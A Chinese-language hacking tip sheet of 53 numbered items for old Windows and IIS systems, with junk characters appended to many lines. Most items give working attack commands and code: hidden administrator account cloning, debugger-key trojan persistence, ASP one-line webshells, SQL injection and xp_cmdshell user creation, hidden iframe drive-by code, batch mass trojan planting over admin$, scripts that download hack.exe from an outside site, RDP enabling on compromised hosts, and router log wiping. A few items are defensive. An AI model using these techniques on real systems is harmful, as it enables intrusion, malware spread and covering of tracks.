1、Xp系统修改权限防止病毒或木马等破坏系统,cmd下,* P# J# `6 h8 c8 }- d0 o
cacls C:\windows\system32 /G hqw20:R f4 t. N( _# @+ L& o9 F
思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入! R# W0 Z7 `- ?0 H. z- @
恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F0 G" T3 m8 R* U/ g
. v0 l/ W& U# f2 x% B2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。
: a% {% x) R2 @( h, f2 H9 o* }. _* T0 D$ s$ Z6 j
3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。* I/ |& q" E- E; k
: F/ C9 t ]2 M6 s+ g4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号" g3 H) U6 s) f5 ]
' {5 K; ]! v/ R4 N u
5、利用INF文件来修改注册表/ a# \: h0 Z0 j) x" ?3 v5 |3 s4 ^
[Version]% W; R9 g' d. c% ]
Signature="$CHICAGO$"
1 L1 z- R* O( k, \: b6 H( T9 o[Defaultinstall]
) C! Z- I. u" f' D& P6 _; h0 Z. vaddREG=Ating. W' b4 f5 Z8 O6 R# ?+ }/ }# b
[Ating]
/ r! Y0 C% {- g. y! xHKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1") o2 f" H3 |7 A! A4 |; l# D& w
以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:
# C# Y2 x6 Z0 m9 g+ ]( f4 |rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径
[8 f8 s# \8 [+ N9 i R" Y5 g) H+ P其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU/ ~, k) E v( s/ _
HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU# m$ W- |' l4 ?2 m8 _" H
HKEY_CURRENT_CONFIG 简写为 HKCC- n! N6 s! x6 x/ a
0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值' a) U9 v# A, G+ G
"1"这里代表是写入或删除注册表键值中的具体数据
. L3 F$ J! u' S4 r2 o( V5 _
' f" r7 u1 v! w) R6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,
4 e4 r. S- _2 L" n: Z多了一步就是在防火墙里添加个端口,然后导出其键值
- W2 @0 O2 P. B( Q[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]& j: D* ?9 N/ O- w2 H" ]4 q; A
2 U/ n4 e1 |8 [) S0 F9 i
7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽) A! L& r4 H* d" O: U
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。( y2 d: Z) W! ]( c& H; H
$ ?1 X5 L. X* @$ D) s
8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。# n4 `% D$ G Y0 G; b: Q
/ x) I7 O8 V% u ]/ x3 f8 S9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,$ h4 G2 a* d8 F% [3 T0 j
可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。
) ]! T, \6 |9 }" ?; T+ r
; H" Q- q# q3 |. v10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”( \; D( H. V- X& h; g' z$ g: A
5 u2 Y8 u) u- V" k E, k6 @
11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
/ l0 A" x5 Y( [, G. V1 ~2 U用法:xsniff –pass –hide –log pass.txt" {! n$ B: j" D
3 a# B$ ~8 Y3 [12、google搜索的艺术8 [! Q7 m$ ] h+ C0 Y+ }
搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”; |! }; e6 o! {0 J" m8 \1 D
或“字符串的语法错误”可以找到很多sql注入漏洞。& c, z/ U7 T8 R+ U$ X! ^) g
B1 B5 n ?( b' `" f' n
13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。8 {6 z- }; Q4 P
; I: @1 i1 D7 a( [: R
14、cmd中输入 nc –vv –l –p 19878 K5 j- L1 ?4 v `, z
做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃( ?9 w5 V/ c9 j1 e$ |. t
u1 f2 k; w0 V( l9 {) i7 |: r15、制作T++木马,先写个ating.hta文件,内容为5 x' D/ {+ d8 [+ q9 P
<script language="VBScript">4 Q4 t6 ?/ ^6 y) |* U- U" E1 P6 J
set wshshell=createobject ("wscript.shell" )* Y2 D: \$ W5 X5 V6 q9 V4 y5 ]
a=wshshell.run("你马的名称",1)3 C* O8 q8 M! N m+ G: V7 q
window.close
# T# H8 u4 S; c3 V" K2 F$ S% [</script>
1 e9 N! w) j; g6 ~3 A9 d6 F再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
1 o/ N8 Z8 |2 Y
$ @: w* [$ C1 X y: G% k16、搜索栏里输入
, L/ w. q* e. z8 |" w6 |关键字%'and 1=1 and '%'='
* h( ~; x8 x3 \- R关键字%'and 1=2 and '%'='
2 p9 j' Q2 @0 o, g. g# P8 }% X比较不同处 可以作为注入的特征字符 p# p' u3 o& @7 ^' a
7 { P; N2 K$ \& I+ n
17、挂马代码<html>
) V) }! g1 g: }<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>
k3 a% y8 a! W5 m& I- k+ }</html>+ X6 }# A O- r; { q4 C- m2 r8 l
7 W2 f; s4 A& g4 j18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,
( I. S0 |4 O' C. o2 i% d) j0 [net localgroup administrators还是可以看出Guest是管理员来。
, z; h& g9 l' g# ^ U) x& p* f% _: N' g$ W, c
19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等. P: P% d' c: a* z2 S
用法: 安装: instsrv.exe 服务名称 路径
& ~/ C' @& ]) P, s/ z* K) a, w卸载: instsrv.exe 服务名称 REMOVE
7 {2 E* Q4 B5 D( _/ R# ~' t; Z" ~& v0 s+ p: d
, F+ ~, t% a: K+ u) J21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉
4 [ [1 C, e& j2 A; W不能注入时要第一时间想到%5c暴库。8 M: s1 d% |5 p& U
c; M$ `8 @ [. t$ r/ Q: T. ]22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~
: u3 | |8 B2 ]4 }. n3 w( z C) o2 I: E( F
23、缺少xp_cmdshell时& D( O3 M5 x" c1 s7 l% K$ ~
尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
, }+ \2 s4 c; F3 ~假如恢复不成功,可以尝试直接加用户(针对开3389的)
8 j7 _% N- S) w! E# ^/ {, e; c0 pdeclare @o int" [ _. {) l/ F4 F: F- H
exec sp_oacreate 'wscript.shell',@o out
% C! c9 ^; V$ s5 ]( P* t6 f$ K5 ?exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员' Q; X. A+ c0 g
" q7 l! S4 u, Q: A7 Z% y. x% V0 E& U24.批量种植木马.bat; {& s0 Y+ B1 p' z: i! J5 z2 z
for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中# u" R9 n9 X% `$ X6 M7 n1 G, J
for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
4 M, a9 u8 J! f3 ~! a扫描地址.txt里每个主机名一行 用\\开头
# G4 k" }. b' P; y2 K& X _- w
8 o) p! `) u( I& y& J25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。
* v2 N' q' h+ u4 p1 ?- A* }' B" p1 i0 l. |
26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
2 x) ^, h; w) j2 [+ _7 Z将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.
9 i M- ]6 H$ c0 ?.cer 等后缀的文件夹下都可以运行任何后缀的asp木马6 d- j" W" n+ _: p" H
( z, |$ A `6 x- |27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
: P( }& R) x4 w% R2 W- `% o然后用#clear logg和#clear line vty *删除日志
' p; l1 A8 K" G' c$ G, M) E7 V( l( p- ?* f
28、电脑坏了省去重新安装系统的方法* z# ?2 H& u/ _* E( z
纯dos下执行,) Z: ` m8 ~7 l" Y
xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config7 v6 w: I( d( Z ~8 e2 j8 e
2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config
$ d/ |& u' l# [
/ r& k1 ?7 n, k4 o29、解决TCP/IP筛选 在注册表里有三处,分别是:
' h* y# @( \& D) A) H5 FHKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
8 r1 y/ N! z. u) h# L" I9 GHKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
' E& m9 N) \% q! X! hHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
% f( K- |* m. g) J9 o分别用- t0 k& W, v# S2 r3 T( z9 {3 x' ]7 N
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
l' _0 b( n; iregedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip# m- P9 f8 a6 Z
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip# n5 E7 c" J! Y% ~
命令来导出注册表项
" n1 T) }) n/ A/ |然后把三个文件里的EnableSecurityFilters"=dword:00000001,
( b( I0 I) H, F# C$ f改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用 d$ E) F/ Y0 E( N- j/ \3 b# b8 |
regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。( m, Q9 ] ~& c2 b
0 k7 f% |8 E5 V. y5 b& {3 j! h30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U
# [/ }+ |+ D' \0 Z# |3 vSER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3
T$ \1 B, @' j$ c3 _) x) G5 \/ Q: O1 F
31、全手工打造开3389工具! D" S( @, L" X$ G" E
打开记事本,编辑内容如下:
2 @! j0 M9 x' e# Jecho [Components] > c:\sql- L, n( L9 v% c# f7 Y% O6 M+ s; `
echo TSEnable = on >> c:\sql
' F. F7 T) R- }, Z* ?8 osysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
, X G- r! ?$ U4 l) L/ `0 F5 o! [编辑好后存为BAT文件,上传至肉鸡,执行
/ V) R8 f) a" _% u8 {- A% S X" j3 E: s" @, f" {- r
32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马
I$ O f; v. c5 ^$ E2 v# R5 c0 g8 c# k, e4 i5 _8 I
33、让服务器重启( Z8 N* W# J# N3 h4 O
写个bat死循环:
9 p o* i9 R. Q@echo off' }2 c) Y; q$ n) I G) X* s1 d3 a
:loop11 |. P5 O7 V( e& q" Q
cls2 d4 L4 L& T! a" a8 [
start cmd.exe6 G$ C9 G+ i" e6 E0 ^
goto loop1' B8 }4 h& C8 t1 \( d0 ?& k
保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启9 o* k3 b1 a( K# k
* X. [3 s- y$ D$ o34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,
% l4 l _3 y* C6 M8 m@echo off
& o0 M, Z4 ]; m$ p1 f8 Idate /t >c:/3389.txt, Y- m s2 X& y0 N) O! M
time /t >>c:/3389.txt
- ~5 o. z* @* l% Wattrib +s +h c:/3389.bat) j: F Y1 f" K/ J0 R* j
attrib +s +h c:/3389.txt
/ D) X% D, T, \) Wnetstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
! Z# h% W; X; q2 t8 }: y并保存为3389.bat& y3 v( J, e: X0 [( z
打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号& o& g+ `6 f" j
3 `7 R. C& _+ T& o3 P4 Q
35、有时候提不了权限的话,试试这个命令,在命令行里输入:5 C# z' v; i6 _" Z6 b- L9 L
start http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)6 e+ ?2 l0 r& A
输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。( f. _8 q s8 d6 _! f# U
8 y' g3 S2 t& ] d8 E6 X7 S+ ~& h2 [/ l6 \
36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件 t( }6 _ T9 W) Q! r7 z
echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址4 T& i, L% U/ i0 P2 I
echo 你的FTP账号 >>c:\1.bat //输入账号
' j, k, P q; ^; {" u, Gecho 你的FTP密码 >>c:\1.bat //输入密码( ~# V% `0 [- e0 b' H* b
echo bin >>c:\1.bat //登入- F8 F6 b, ^, z$ X
echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么
5 z6 h* B2 z; i9 x1 N p( cecho bye >>c:\1.bat //退出
2 J5 K; m$ [3 t$ }! J) x然后执行ftp -s:c:\1.bat即可
" K* d, h& V7 K2 h1 i2 g& N0 \! _& g0 @- }
37、修改注册表开3389两法
: n: ?5 I* x" K& j* `/ e3 Y' y(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表' W0 I$ y8 |3 }
echo Windows Registry Editor Version 5.00 >>3389.reg
/ R1 \, s+ }% d$ pecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg5 R& a E* t! A8 t( `
echo "Enabled"="0" >>3389.reg
6 i2 t* p! e1 J8 t* u& F! qecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
2 B; R, I" z" F6 \2 m& CNT\CurrentVersion\Winlogon] >>3389.reg
( }: a! i* ~. Q1 j3 K: eecho "ShutdownWithoutLogon"="0" >>3389.reg7 {/ ] f2 ~ _
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]9 }5 j0 j& U0 R7 j0 L0 p8 z$ E# R9 Z
>>3389.reg+ `( u) Q! J7 x, P9 }( n# j
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg- O: M1 T" [5 p) p4 |9 _! b
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]* l W8 G u1 d/ O' ~# a
>>3389.reg
) F5 I. \2 Z: F$ R0 ?echo "TSEnabled"=dword:00000001 >>3389.reg
8 y5 G9 o% H! d. lecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
8 c8 ~3 `" E; ]: F+ g- hecho "Start"=dword:00000002 >>3389.reg
- \/ K K4 P, lecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
5 u% Z# k: L1 u0 q6 q6 }4 ]# y! l>>3389.reg! w; {. I' x$ d$ l
echo "Start"=dword:00000002 >>3389.reg8 H5 L6 [; M) o8 g' T+ K! F
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
/ ^- }4 u1 h5 X. Wecho "Hotkey"="1" >>3389.reg
9 V: f( q3 C$ H0 _# necho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
: |* a0 o9 ^' W n3 _' v% ?) A2 VServer\Wds\rdpwd\Tds\tcp] >>3389.reg2 r& Y/ x8 \, N0 A$ b* w% u
echo "PortNumber"=dword:00000D3D >>3389.reg9 Y# C9 @0 ^* D0 v$ N6 j- u% A
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal2 y. f5 B$ p0 T3 Z" w0 q4 l
Server\WinStations\RDP-Tcp] >>3389.reg
/ u6 X$ G' r$ m/ B. t& u/ Oecho "PortNumber"=dword:00000D3D >>3389.reg2 p) X5 V% L; S) W' g
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。$ N. d! Z* U$ i( T9 Z9 c
(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
% d7 Z, S3 H! ]2 L因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效
3 ] C u V' u+ [$ J9 \/ e- c(2)winxp和win2003终端开启7 D c d$ l1 ~: s/ `2 @
用以下ECHO代码写一个REG文件:, R3 i- A- y( f: E- P
echo Windows Registry Editor Version 5.00>>3389.reg
" u* f, k7 p0 g, ~echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
# g& t* s* `! v) S4 n0 vServer]>>3389.reg+ _: _0 F N! n, O4 \* c, y" U; I
echo "fDenyTSConnections"=dword:00000000>>3389.reg: s% `9 d4 K V' f- q) x/ Q
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
3 F$ f; j& W& S4 wServer\Wds\rdpwd\Tds\tcp]>>3389.reg! K- T8 L: }5 }( w' f2 V# g' A7 K3 N
echo "PortNumber"=dword:00000d3d>>3389.reg8 o0 D2 ?9 W3 S b: p
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal6 W" \" f m7 k7 P% C1 {
Server\WinStations\RDP-Tcp]>>3389.reg
- f5 t& y& R# ~- t: j$ R& ?echo "PortNumber"=dword:00000d3d>>3389.reg
4 |' J2 F) t0 F* G然后regedit /s 3389.reg del 3389.reg1 J! j7 G* A+ z9 [3 e
XP下不论开终端还是改终端端口都不需重启
, W! d9 O: e) M5 ~9 ~! h" n# X7 e) w8 ~$ }
38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃. O, |. ]5 c" y) P$ @! I+ ~
用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'- o7 B" ]9 a, R
3 L' i4 J0 w& [0 h9 @; q
39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!- R. v; k1 k. z0 r
(1)数据库文件名应复杂并要有特殊字符
# `& ~! D# \' B# P(2)不要把数据库名称写在conn.asp里,要用ODBC数据源/ w7 l0 E) L4 B8 w) T F9 n1 A* k
将conn.asp文档中的8 y/ w9 }! \0 l# d) k" n8 l* u
DBPath = Server.MapPath("数据库.mdb")7 `4 S T5 ~4 |& J4 X* j
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
9 S) x' b2 J. [- g, m' }0 v d. A
修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置3 P/ m/ c, P; y
(3)不放在WEB目录里
: W' [6 G+ t* Y0 m& i. L N
8 g2 ^: f! Q7 d9 s# C1 S40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉2 L* F3 {! R8 Q* a) T! X& c2 O
可以写两个bat文件- M9 s4 E5 W& O; R9 d6 p
@echo off
/ j8 @$ N- [4 I7 M- e/ f# S& o@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe
$ x6 d& q* T* K6 m: r0 [' ]. D x@del c:\winnt\system32\query.exe. Z# V: |9 F5 ?) v% R: o
@del %SYSTEMROOT%\system32\dllcache\query.exe! f8 f: f) z, G
@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的
9 H: m0 w4 M' O4 v' [0 D' |7 H4 _7 y" d9 X- ^3 ?% T S$ k
@echo off- G2 p) [5 @( f4 u
@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe% b2 q0 T1 Y1 E7 g9 \# f& E9 m/ M
@del c:\winnt\system32\tsadmin.exe7 E/ I9 Z8 d4 q) ?* z5 q! K& |, `
@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex
9 ~' L; z9 g. Y' o
7 g- \' j0 j, O+ r& E( l41、映射对方盘符
/ n1 C) _) v4 X' Xtelnet到他的机器上,
! N) C q: K1 R) j5 Y& j2 Y' hnet share 查看有没有默认共享 如果没有,那么就接着运行
+ N# G8 Z& X0 L3 {( ~( m4 _net share c$=c:! {/ k s$ {. a
net share现在有c$
2 c' H0 y' D- c- O在自己的机器上运行/ v, L/ ]3 S$ L$ j1 E8 l5 e
net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K
, z& n+ s/ n: X1 ~, @
# y$ B: b& r$ r; F5 T. k" U42、一些很有用的老知识- g$ [" s0 K0 B
type c:\boot.ini ( 查看系统版本 ); y5 ?. ?& s; I+ W5 j: C; v$ y
net start (查看已经启动的服务)
% Z0 E4 K3 s/ _query user ( 查看当前终端连接 )5 j/ _: K1 F% H8 u5 ^% t
net user ( 查看当前用户 )
# }% D6 E5 n0 ^) bnet user 用户 密码/add ( 建立账号 )
7 P( a( K, t4 `% F$ N5 @3 ?net localgroup administrators 用户 /add (提升某用户为管理员)% p# [% y7 \% r3 m
ipconfig -all ( 查看IP什么的 )9 ~; I7 i) }6 t! w8 F
netstat -an ( 查看当前网络状态 )
6 D( c1 T: p' o! I- G' E' `4 ofindpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)% ]; y, X' W" g; p( @
克隆时Administrator对应1F46 ]% G! U5 {8 H" v) K% k7 ]
guest对应1F5
6 O8 D8 ?0 P+ n6 X+ {/ I4 N& Ntsinternetuser对应3E8
& D1 O& J: u) A2 C C" @% ~" v) ^( u* v
43、如果对方没开3389,但是装了Remote Administrator Service
9 q6 s" K$ u- J+ v用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接8 s) e( [" V2 o& m8 B
解释:用serv-u漏洞导入自己配制好的radmin的注册表信息$ N) B; i5 w% c5 n: t, k' x& V
先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"4 s5 r& y6 Y' D5 }2 v7 _
& m9 o. u0 ~* T. C
44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)
$ v1 E" z. n* n& c本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)4 G, O% h7 Y) a9 H8 f1 J, C
* R% h/ Y1 l, j45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入), Z+ y& E/ n2 e: _/ @% A3 ]; n
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open0 ?2 q: k& W7 o( [# R; a5 k. r
^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =! R# V; g1 l# O- u3 ]
CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =
0 Z4 I( E5 ?% [* m1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs" @ w( m8 {* F7 H2 q& N+ Z7 |
(这是完整的一句话,其中没有换行符)
7 X W: N) D: k然后下载:( i- s) k8 \0 |% [
cscript down.vbs http://www.hack520.org/hack.exe hack.exe
5 l V& }7 {1 a( |, ^! G
1 e8 I. \4 g0 |5 {46、一句话木马成功依赖于两个条件:% v0 ]) W T* ~2 u: l) H
1、服务端没有禁止adodb.Stream或FSO组件
1 W* [8 a! t- Y6 k6 r2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。0 K/ J i1 O; Q; I6 J
d) a9 ]- s$ h5 ^% o
47、利用DB_OWNER权限进行手工备份一句话木马的代码:6 f6 | S& W4 h6 B
;alter database utsz set RECOVERY FULL--3 n6 ]" c3 v3 `8 E; E4 o; j2 L) a
;create table cmd (a image)--
/ c5 I M1 C6 V* C;backup log utsz to disk = 'D:\cmd' with init--2 U3 q; G- @! p% u$ X3 x
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--8 R# k2 U; V. p+ E* Q8 E- w
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--: T& J/ l( n" s- O9 X
注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。
i, g9 l+ \4 @5 R% @
5 s) T; G5 u+ P48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:
' O2 y2 i) G% O9 z6 k
4 d/ u8 r) P1 u6 M7 d. A9 P, M$ H用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
, }/ G' i/ N' ]2 k F) s所有会话用 'all'。1 W% K& A/ @( `
-s sessionid 列出会话的信息。
+ q) F2 f @/ x, N3 Q-k sessionid 终止会话。6 q5 a5 z% z$ k
-m sessionid 发送消息到会话。
! X3 y& u" ^2 y2 [0 E" X! k* j
2 g" [) f S$ a& {; I" {5 F$ econfig 配置 telnet 服务器参数。
/ J+ L3 ?# a7 f
& t- ~0 x5 ?) i# N/ c, o4 @common_options 为:
$ t+ X0 N+ s+ u! i. M- K-u user 指定要使用其凭据的用户" r7 T4 v1 z( [, Q! p# H! k' r5 O
-p password 用户密码
) k0 b* p- \9 L* D9 X. P! Y# N3 L6 b" ?; {# R1 X$ u
config_options 为:+ O3 q; e" Y/ r) ]2 G& i8 L5 \2 [
dom = domain 设定用户的默认域1 a( ~/ Q' q5 ~ j$ g
ctrlakeymap = yes|no 设定 ALT 键的映射: H7 f" @- A7 h. |5 {9 Y
timeout = hh:mm:ss 设定空闲会话超时值
0 U; v1 @% U1 v+ p9 Itimeoutactive = yes|no 启用空闲会话。4 d! ~, k& H6 j: Z' B& S. @
maxfail = attempts 设定断开前失败的登录企图数。# K6 J" s. G9 @) J' ~
maxconn = connections 设定最大连接数。
, ?. Z. p( v7 [" Y. iport = number 设定 telnet 端口。
( A( F; G0 j% J2 Msec = [+/-]NTLM [+/-]passwd* Z( M6 N3 L a* d( J, U3 }) \, f
设定身份验证机构 i/ ^ n* y* b( ? _
fname = file 指定审计文件名。( x3 X r7 y4 {* J. \
fsize = size 指定审计文件的最大尺寸(MB)。
" v9 `, f }/ ]. w; Kmode = console|stream 指定操作模式。 R0 U( V( u* `1 A4 a8 `
auditlocation = eventlog|file|both" Z5 q7 i5 N) U4 P0 @3 T( y2 C
指定记录地点
# ^ v4 y: E7 S8 Q0 S$ `audit = [+/-]user [+/-]fail [+/-]admin {0 \" x: w# }: I8 P5 }
' b) F, w6 ~2 R2 J- y49、例如:在IE上访问:/ f) n o2 j4 J. s
www.hack520.org/hack.txt就会跳转到http://www.hack520.org/
3 a7 ]0 w* B, { N& H0 h- yhack.txt里面的代码是:% q9 p2 N2 ?; w) Q" n
<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">
+ R/ } i8 |$ p把这个hack.txt发到你空间就可以了!. u. l+ Q0 Y# D9 r: V3 N
这个可以利用来做网马哦!
+ `' [2 D9 q% Q) L
& M6 y4 |8 ^- i4 ]) o; m4 h50、autorun的病毒可以通过手动限制!, ^+ A3 h' k$ \. W% Y
1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!' j" V8 u- H7 t+ `
2,打开盘符用右键打开!切忌双击盘符~
5 ?- m, C, b1 x8 W% E% k3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!
- X) P& \# n7 x5 D5 D, t2 m p$ ]4 B
51、log备份时的一句话木马:- j$ s' z. o% h4 Z8 o, O
a).<%%25Execute(request("go"))%%25>4 o- g9 N4 \. [+ S
b).<%Execute(request("go"))%>
6 s6 B& Y/ s# m" s! K. @( Ac).%><%execute request("go")%><%/ s$ k4 s& M3 f' k3 M/ |/ }
d).<script language=VBScript runat=server>execute request("sb")</Script>
, K3 [$ `4 i/ t% J" ve).<%25Execute(request("l"))%25>6 E5 i: U& c* P4 |5 I
f).<%if request("cmd")<>"" then execute request("pass")%>4 O9 B) b. j1 S v" ]) K" `- e
- {* B' F2 B6 }6 O
52、at "12:17" /interactive cmd
0 \( b; T t# m! O/ p# r7 b执行后可以用AT命令查看新加的任务
9 [0 W* F6 W, w4 O, G4 H用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。
) @& {0 @9 q' ~2 u6 B
% @" s4 G! t' x. ^9 }# _53、隐藏ASP后门的两种方法, k7 C& r- b" y! s# K6 }; g Z
